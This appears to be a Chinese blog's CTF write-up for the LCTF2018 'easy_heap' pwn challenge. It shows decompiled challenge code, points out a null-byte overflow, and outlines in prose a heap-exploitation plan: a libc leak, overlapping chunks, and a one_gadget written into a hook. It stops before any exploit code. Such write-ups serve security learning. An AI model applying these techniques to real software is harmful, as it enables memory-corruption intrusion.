<!DOCTYPE html>
<html lang="en">
    <!-- title -->


    

<!-- keywords -->



<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="author" content="John Doe">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="John Doe">
    
        <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta name="description" content="参考链接：https:&#x2F;&#x2F;ctf-wiki.org&#x2F;pwn&#x2F;linux&#x2F;user-mode&#x2F;heap&#x2F;ptmalloc2&#x2F;tcache-attack&#x2F; https:&#x2F;&#x2F;hollk.blog.csdn.net&#x2F;article&#x2F;details&#x2F;113697892?spm&#x3D;1001.2014.3001.5502  保护检查 IDA分析main函数1234567891011121314151617181">
<meta property="og:type" content="article">
<meta property="og:title" content="LCTF2018 easy_heap">
<meta property="og:url" content="http://example.com/2022/04/17/LCTF2018%20PWN%20easy_heap/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="参考链接：https:&#x2F;&#x2F;ctf-wiki.org&#x2F;pwn&#x2F;linux&#x2F;user-mode&#x2F;heap&#x2F;ptmalloc2&#x2F;tcache-attack&#x2F; https:&#x2F;&#x2F;hollk.blog.csdn.net&#x2F;article&#x2F;details&#x2F;113697892?spm&#x3D;1001.2014.3001.5502  保护检查 IDA分析main函数1234567891011121314151617181">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053214.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053216.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053217.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053218.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053219.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053220.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053221.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053222.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053223.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053224.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053225.png">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053226.png">
<meta property="article:published_time" content="2022-04-17T07:57:44.204Z">
<meta property="article:modified_time" content="2022-04-17T13:40:03.691Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="tcache">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053214.png">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <link rel="icon" href="/assets/favicon.ico">
    
    <title>LCTF2018 easy_heap · 渐渐的博客</title>
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
    (function (w) {
        'use strict'
        // rel=preload support test
        if (!w.loadCSS) {
            w.loadCSS = function () {}
        }
        // define on the loadCSS obj
        var rp = (loadCSS.relpreload = {})
        // rel=preload feature support test
        // runs once and returns a function for compat purposes
        rp.support = (function () {
            var ret
            try {
                ret = w.document.createElement('link').relList.supports('preload')
            } catch (e) {
                ret = false
            }
            return function () {
                return ret
            }
        })()

        // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
        // then change that media back to its intended value on load
        rp.bindMediaToggle = function (link) {
            // remember existing media attr for ultimate state, or default to 'all'
            var finalMedia = link.media || 'all'

            function enableStylesheet() {
                link.media = finalMedia
            }

            // bind load handlers to enable media
            if (link.addEventListener) {
                link.addEventListener('load', enableStylesheet)
            } else if (link.attachEvent) {
                link.attachEvent('onload', enableStylesheet)
            }

            // Set rel and non-applicable media type to start an async request
            // note: timeout allows this to happen async to let rendering continue in IE
            setTimeout(function () {
                link.rel = 'stylesheet'
                link.media = 'only x'
            })
            // also enable media after 3 seconds,
            // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
            setTimeout(enableStylesheet, 3000)
        }

        // loop through link elements in DOM
        rp.poly = function () {
            // double check this to prevent external calls from running
            if (rp.support()) {
                return
            }
            var links = w.document.getElementsByTagName('link')
            for (var i = 0; i < links.length; i++) {
                var link = links[i]
                // qualify links to those with rel=preload and as=style attrs
                if (
                    link.rel === 'preload' &&
                    link.getAttribute('as') === 'style' &&
                    !link.getAttribute('data-loadcss')
                ) {
                    // prevent rerunning on link
                    link.setAttribute('data-loadcss', true)
                    // bind listeners to toggle media back
                    rp.bindMediaToggle(link)
                }
            }
        }

        // if unsupported, run the polyfill
        if (!rp.support()) {
            // run once at least
            rp.poly()

            // rerun poly on an interval until onload
            var run = w.setInterval(rp.poly, 500)
            if (w.addEventListener) {
                w.addEventListener('load', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            } else if (w.attachEvent) {
                w.attachEvent('onload', function () {
                    rp.poly()
                    w.clearInterval(run)
                })
            }
        }

        // commonjs
        if (typeof exports !== 'undefined') {
            exports.loadCSS = loadCSS
        } else {
            w.loadCSS = loadCSS
        }
    })(typeof global !== 'undefined' ? global : this)
</script>

    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }
</style>

    <link rel="preload" href="/css/style.css?v=20210823" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="/css/dark.css?v=20210823" as="style">
    <link rel="stylesheet" href="/css/dark.css" media="(prefers-color-scheme: dark)">
    <link rel="stylesheet" href="/css/mobile.css?v=20210823" media="(max-width: 960px)">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" as="script">
    <link rel="preload" href="/scripts/main.js?v=20210823" as="script">
    <link rel="preload" href="/scripts/dark.js?v=20210823" as="script">
    <link rel="preload" href="/font/Oswald-Regular.ttf" as="font" crossorigin>
    <link rel="preload" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" as="font" crossorigin>
    <!-- algolia -->
    
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
<meta name="generator" content="Hexo 5.4.0"></head>

    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ == undefined) {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js" />')
        }
    </script>
    
        <body class="post-body">
    
        <!-- header -->
        <header class="header header-mobile">
    <!-- top read progress line -->
    <div class="header-element">
        <div class="read-progress"></div>
    </div>
    <!-- sidebar menu button -->
    <div class="header-element">
        
            <div class="header-sidebar-menu">
        
            
                <div style="padding-left: 1px;">&#xe775;</div>
            
        </div>
    </div>
    <!-- header actions -->
    <div class="header-actions">
        <!-- theme mode switch button -->
        <span class="header-theme-btn header-element">
            <i class="fas fa-adjust"></i>
        </span>
        <!-- back to home page text -->
        <span class="home-link header-element">
            <a href=/>渐渐的博客</a>
        </span>
    </div>
    <!-- toggle banner for post layout -->
    
        
            <div class="banner">
        
            <div class="blog-title header-element">
                <a href="/">渐渐的博客</a>
            </div>
            <div class="post-title header-element">
                <a href="#" class="post-name">LCTF2018 easy_heap</a>
            </div>
        </div>
    
</header>

        <!-- fixed footer -->
        <footer class="footer-fixed">
    <!-- back to top button -->
    <div class="footer-fixed-element">
        
            <div class="back-top back-top-hidden">
        
        
            <div>&#xe639;</div>
        
        </div>
    </div>
</footer>

        <!-- wrapper -->
        <div class="wrapper">
            <div class="site-intro" style="







    height:50vh;

">
    
    <!-- 主页  -->
    
        
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/wlop1.jpeg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
                LCTF2018 easy_heap
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
                
            <!-- 404 -->
            
        </p>
        <!-- 文章页 meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
    
        <a class="post-tag" href="javascript:void(0);" data-tags="tcache">tcache</a>
    
</div>

                
                
                    <div class="post-intro-read">
                        <span>Word count: <span class="post-count word-count">2.7k</span>Reading time: <span class="post-count reading-time">12 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <!-- 撰写日期 -->
                    <span class="iconfont-archer post-intro-calander">&#xe676;</span>
                    <span class="post-intro-time">2022/04/17</span>
                    <!-- busuanzi -->
                    
                        <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                            <span class="iconfont-archer post-intro-busuanzi">&#xe602;</span>
                            <span id="busuanzi_value_page_pv"></span>
                        </span>
                    
                    <!-- 文章分享 -->
                    <span class="share-wrapper">
                        <span class="iconfont-archer share-icon">&#xe71d;</span>
                        <span class="share-text">Share</span>
                        <ul class="share-list">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>

            <script>
  // get user agent
  function getBrowserVersions() {
    var u = window.navigator.userAgent
    return {
      userAgent: u,
      trident: u.indexOf('Trident') > -1, //IE内核
      presto: u.indexOf('Presto') > -1, //opera内核
      webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
      gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
      mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
      ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
      android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
      iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
      iPad: u.indexOf('iPad') > -1, //是否为iPad
      webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
      weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
      uc: u.indexOf('UCBrowser') > -1, //是否为android下的UC浏览器
    }
  }
  var browser = {
    versions: getBrowserVersions(),
  }
  console.log('userAgent: ' + browser.versions.userAgent)

  // callback
  function fontLoaded() {
    console.log('font loaded')
    if (document.getElementsByClassName('site-intro-meta')) {
      document
        .getElementsByClassName('intro-title')[0]
        .classList.add('intro-fade-in')
      document
        .getElementsByClassName('intro-subtitle')[0]
        .classList.add('intro-fade-in')
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in')
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb() {
    if (browser.versions.uc) {
      console.log('UCBrowser')
      fontLoaded()
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular'],
        },
        loading: function () {
          // 所有字体开始加载
          // console.log('font loading');
        },
        active: function () {
          // 所有字体已渲染
          fontLoaded()
        },
        inactive: function () {
          // 字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout')
          fontLoaded()
        },
        timeout: 5000, // Set the timeout to two seconds
      })
    }
  }

  function asyncErr() {
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document,
      t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0]
    o.src = u
    if (cb) {
      o.addEventListener(
        'load',
        function (e) {
          cb(null, e)
        },
        false
      )
    }
    if (err) {
      o.addEventListener(
        'error',
        function (e) {
          err(null, e)
        },
        false
      )
    }
    s.parentNode.insertBefore(o, s)
  }

  var asyncLoadWithFallBack = function (arr, success, reject) {
    var currReject = function () {
      reject()
      arr.shift()
      if (arr.length) async(arr[0], success, currReject)
    }

    async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack(
    [
      'https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js',
      'https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js',
      "/lib/webfontloader.min.js",
    ],
    asyncCb,
    asyncErr
  )
</script>

            <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
            <div class="container container-unloaded">
                <main class="main post-page">
    <article class="article-entry">
        <blockquote>
<p>参考链接：<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/tcache-attack/">https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/tcache-attack/</a></p>
<p><a target="_blank" rel="noopener" href="https://hollk.blog.csdn.net/article/details/113697892?spm=1001.2014.3001.5502">https://hollk.blog.csdn.net/article/details/113697892?spm=1001.2014.3001.5502</a></p>
</blockquote>
<h3 id="保护检查"><a href="#保护检查" class="headerlink" title="保护检查"></a>保护检查</h3><p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053214.png" alt="image-20220410171957005"></p>
<h3 id="IDA分析"><a href="#IDA分析" class="headerlink" title="IDA分析"></a>IDA分析</h3><h4 id="main函数"><a href="#main函数" class="headerlink" title="main函数"></a>main函数</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> __fastcall __noreturn <span class="title">main</span><span class="params">(__int64 a1, <span class="keyword">char</span> **a2, <span class="keyword">char</span> **a3)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> v3; <span class="comment">// eax</span></span><br><span class="line"></span><br><span class="line">  sub_A3A(a1, a2, a3);</span><br><span class="line">  qword_202050 = <span class="built_in">calloc</span>(<span class="number">0xA0</span>uLL, <span class="number">1uLL</span>);</span><br><span class="line">  <span class="keyword">if</span> ( !qword_202050 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;init error!&quot;</span>);</span><br><span class="line">    sub_BBF();</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      menu();</span><br><span class="line">      v3 = sub_CAD();</span><br><span class="line">      <span class="keyword">if</span> ( v3 != <span class="number">2</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      del();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> ( v3 &gt; <span class="number">2</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( v3 == <span class="number">3</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        show();</span><br><span class="line">      &#125;</span><br><span class="line">      <span class="keyword">else</span> <span class="keyword">if</span> ( v3 == <span class="number">4</span> )</span><br><span class="line">      &#123;</span><br><span class="line">        sub_BBF();</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> <span class="keyword">if</span> ( v3 == <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      add();</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>首先调用calloc()函数创建一个size为<code>0xb0</code>大小的chunk，并将其malloc指针赋给存放在<code>.bss</code>段的<code>tk</code>全局变量。</p>
<h4 id="add函数"><a href="#add函数" class="headerlink" title="add函数"></a>add函数</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_CFC</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  __int64 v0; <span class="comment">// rbx</span></span><br><span class="line">  <span class="keyword">int</span> i; <span class="comment">// [rsp+0h] [rbp-20h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v3; <span class="comment">// [rsp+4h] [rbp-1Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// [rsp+8h] [rbp-18h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="keyword">for</span> ( i = <span class="number">0</span>; i &lt;= <span class="number">9</span> &amp;&amp; *(<span class="number">16LL</span> * i + qword_202050); ++i )</span><br><span class="line">    ;</span><br><span class="line">  <span class="keyword">if</span> ( i == <span class="number">10</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;full!&quot;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    v0 = qword_202050;</span><br><span class="line">    *(v0 + <span class="number">16LL</span> * i) = <span class="built_in">malloc</span>(<span class="number">0xF8</span>uLL);</span><br><span class="line">    <span class="keyword">if</span> ( !*(<span class="number">16LL</span> * i + qword_202050) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;malloc error!&quot;</span>);</span><br><span class="line">      sub_BBF();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;size \n&gt; &quot;</span>);</span><br><span class="line">    v3 = sub_CAD();</span><br><span class="line">    <span class="keyword">if</span> ( v3 &gt; <span class="number">0xF8</span> )</span><br><span class="line">      sub_BBF();</span><br><span class="line">    *(<span class="number">16LL</span> * i + qword_202050 + <span class="number">8</span>) = v3;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;content \n&gt; &quot;</span>);</span><br><span class="line">    sub_BEC(*(<span class="number">16LL</span> * i + qword_202050), *(<span class="number">16LL</span> * i + qword_202050 + <span class="number">8</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v4;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">chunk结构体</span><br><span class="line">    <span class="built_in">malloc</span>指针 <span class="number">8</span>字节 存放在v3 + <span class="number">16LL</span> * i</span><br><span class="line">    chunk_size <span class="number">8</span>字节 存放在<span class="number">16LL</span> * i + tk + <span class="number">8</span></span><br></pre></td></tr></table></figure>

<h4 id="sub-BBF-函数"><a href="#sub-BBF-函数" class="headerlink" title="sub_BBF()函数"></a>sub_BBF()函数</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 __fastcall <span class="title">sub_BEC</span><span class="params">(_BYTE *a1, <span class="keyword">int</span> a2)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">signed</span> <span class="keyword">int</span> v3; <span class="comment">// [rsp+14h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  v3 = <span class="number">0</span>;</span><br><span class="line">  <span class="keyword">if</span> ( a2 )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">    &#123;</span><br><span class="line">      read(<span class="number">0</span>, &amp;a1[v3], <span class="number">1uLL</span>);</span><br><span class="line">      <span class="keyword">if</span> ( a2 - <span class="number">1</span> &lt; v3 || !a1[v3] || a1[v3] == <span class="number">10</span> )</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">      ++v3;</span><br><span class="line">    &#125;</span><br><span class="line">    a1[v3] = <span class="number">0</span>;</span><br><span class="line">    a1[a2] = <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">else</span></span><br><span class="line">  &#123;</span><br><span class="line">    *a1 = <span class="number">0</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v4;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>循环结束之后会在a1的最后一个size字节填上<code>\0</code>,，存在<code>null-byte-overflow</code>漏洞，会覆盖下一个chunk的<code>inuse</code>标志位</p>
<h4 id="del-函数"><a href="#del-函数" class="headerlink" title="del()函数"></a>del()函数</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_E57</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;index \n&gt; &quot;</span>);</span><br><span class="line">  v1 = sub_CAD();</span><br><span class="line">  <span class="keyword">if</span> ( v1 &gt; <span class="number">9</span> || !*(<span class="number">16LL</span> * v1 + qword_202050) )</span><br><span class="line">    sub_BBF();</span><br><span class="line">  <span class="built_in">memset</span>(*(<span class="number">16LL</span> * v1 + qword_202050), <span class="number">0</span>, *(<span class="number">16LL</span> * v1 + qword_202050 + <span class="number">8</span>));</span><br><span class="line">  <span class="built_in">free</span>(*(<span class="number">16LL</span> * v1 + qword_202050));</span><br><span class="line">  *(<span class="number">16LL</span> * v1 + qword_202050 + <span class="number">8</span>) = <span class="number">0</span>;</span><br><span class="line">  *(<span class="number">16LL</span> * v1 + qword_202050) = <span class="number">0LL</span>;</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>判断index是否合法，且free chunk的指针后，将指针和size都置0，无漏洞</p>
<h4 id="show-函数"><a href="#show-函数" class="headerlink" title="show()函数"></a>show()函数</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">sub_F4E</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">unsigned</span> <span class="keyword">int</span> v1; <span class="comment">// [rsp+4h] [rbp-Ch]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v2; <span class="comment">// [rsp+8h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v2 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;index \n&gt; &quot;</span>);</span><br><span class="line">  v1 = sub_CAD();</span><br><span class="line">  <span class="keyword">if</span> ( v1 &gt; <span class="number">9</span> || !*(<span class="number">16LL</span> * v1 + qword_202050) )</span><br><span class="line">    sub_BBF();</span><br><span class="line">  <span class="built_in">puts</span>(*(<span class="number">16LL</span> * v1 + qword_202050));</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ v2;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>若输出的index合法且存在则调用puts()函数打印chunk中的内容</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>由于got表不可写，那么只能向hook中写了。向hook中写什么？当然是one_gadget了，如果想得到gadget那么势必要得到libc的基地址。所以首先的第一步是泄露libc基地址！</p>
<p>那么在确定第一步泄露libc基地址后，就需要怎么去泄露。首先必要的输出程序中是有的：show（）函数。根据以往的做题经验，我们可以通过泄露unsorted bin中空闲块的方式先泄露处main_arena + 偏移，接着确定main_arena地址，进而确定libc基地址</p>
<p>对比以往的做题，我们都是利用堆溢出的方式去修改被释放chunk的fd或者bk，但是这道题并没有修改data的功能，值存在一个null-byte-overflow漏洞，那么脑海中就应该想到关于inuse位的利用方法：overlapping heap chunk。</p>
<p>如果想要利用overlapping heap chunk，我们还需要能够控制被溢出inuse标志位所在块的<code>prev_size</code>。虽然我们不能通过堆溢出构造，但是可以利用unsorted bin中<code>堆块合并</code>的机制去修改prev_size的值，尤其是这种每个chunk大小相同的情况下。</p>
<h4 id="首先利用堆块合并改写pre-size"><a href="#首先利用堆块合并改写pre-size" class="headerlink" title="首先利用堆块合并改写pre_size"></a>首先利用堆块合并改写pre_size</h4><p>实现的代码</p>
